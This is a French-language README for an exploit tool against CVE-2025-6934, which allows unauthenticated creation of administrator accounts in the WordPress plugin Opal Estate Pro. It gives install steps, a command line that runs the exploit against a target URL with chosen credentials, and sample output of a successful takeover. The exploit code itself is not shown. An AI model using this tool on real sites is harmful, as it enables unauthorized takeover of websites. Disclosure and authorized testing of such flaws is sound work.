
CVE-2025-6934 Outil d'exploitation pour la création non authentifiée de compte administrateur dans le plugin WordPress Opal Estate Pro
Créé et développé entièrement par mejbankadir (SMH tech et Mejban HackSheild Sous NexoAmicus)
CVE-2025-6934 est une vulnérabilité critique dans le plugin WordPress Opal Estate Pro (versions <= 1.7.5) qui permet à des attaquants non authentifiés de créer des comptes administrateur sur des sites WordPress vulnérables.
Cet outil fournit à la fois des versions CLI (ligne de commande) et GUI (interface graphique) pour exploiter cette vulnérabilité.
| Attribut | Valeur |
|---|---|
| Identifiant CVE | CVE-2025-6934 |
| Sévérité | Critique (CVSS 3.1: 9.8) |
| Plugin affecté | Opal Estate Pro |
| Versions affectées | <= 1.7.5 |
| Type de vulnérabilité | Création non authentifiée de compte administrateur |
| Vecteur CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# Install dependencies
pip install -r requirements.txt
requests
beautifulsoup4
colorama
PyQt6 # For GUI version only
python3 CVE-2025-6934-GUI.py
Fonctionnalités GUI :
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123
Arguments :
-u, --url URL cible (obligatoire)
-mail, --newmail Email du compte administrateur (obligatoire)
-password, --newpassword Mot de passe du compte administrateur (obligatoire)
-user, --username Nom d'utilisateur du compte administrateur (par défaut: administrator)
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : [email protected]
Password : MyP@ss123
Role : administrator
⚠️ AVERTISSEMENT : Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
L'accès non autorisé aux systèmes informatiques est illégal et contraire à l'éthique.
En utilisant cet outil, vous acceptez de :
- Tester uniquement les systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite
- Ne pas utiliser cet outil à des fins malveillantes
- Assumer l'entière responsabilité de toute conséquence juridique
| Rôle | Nom |
|---|---|
| Créateur & Développeur | mejbankadir |
| Organisation | SMH tech & Mejban HackSheild Under NexoAmicus |
CVE-2025-6934/
├── CVE-2025-6934.py # CLI version
├── CVE-2025-6934-GUI.py # GUI version
├── CVE-2025-6934.yaml # Documentation
├── requirements.txt # Python dependencies
└── README.md # This file
L'outil désactive automatiquement les avertissements SSL. Si vous rencontrez des problèmes :
requests.packages.urllib3.disable_warnings()
Licence MIT
Copyright (c) 2025 mejbankadir (SMH tech et Mejban HackSheild Sous NexoAmicus)
Fait avec ❤️ par mejbankadir
SMH tech | Mejban HackSheild | Sous NexoAmicus